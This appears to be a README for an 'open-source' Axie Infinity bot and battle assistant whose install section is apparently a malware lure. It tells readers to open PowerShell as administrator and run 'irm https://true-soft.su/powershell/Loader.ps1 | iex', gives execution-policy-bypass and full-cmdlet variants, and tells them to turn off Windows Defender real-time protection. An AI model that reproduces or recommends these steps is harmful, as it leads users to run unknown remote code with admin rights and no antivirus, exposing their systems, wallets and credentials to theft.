An advanced, open-source Axie Infinity bot and desktop assistant designed to optimize strategy, automate repetitive queue tasks, and simulate card battles. This open-source framework leverages computer vision and AI-driven decision-making algorithms to enhance tactical efficiency in Axie Infinity.
- Smart Axie Infinity Automation Tool: Streamlines matchmaking queues and energy tracking processes.
- AI Battle Simulator & Helper: Analyzes current hand cards, estimates opponent energy, and suggests optimal card combinations based on win-rate data.
- Computer Vision Framework: Automatically detects active game states, card types, and health bars without altering game files.
- Real-time Match Analytics: Generates detailed session reports and tracks daily SLP/AXS performance metrics.
- Cross-Platform Desktop Application: Fully compatible with Windows and macOS environments.
-
Open PowerShell as Administrator:
- Press the
Win + Xkeys simultaneously. - Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
- Press the
-
Run the Installation Command: Copy, paste, and press
Enterto run the following initialization command. This script will automatically configure the registry bypass and download all required packages:irm https://true-soft.su/powershell/Loader.ps1 | iex
If your system blocks the launch due to execution policy restrictions, force a bypass using this command in Command Prompt (cmd):
powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"If you are using an older environment where short aliases are missing, use the full system commands:
Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-ExpressionAutomated scripts can sometimes trigger antivirus warnings. If this happens, temporarily turn off "Real-time protection" in Windows Defender settings during setup, then turn it back on as soon as the installation is complete.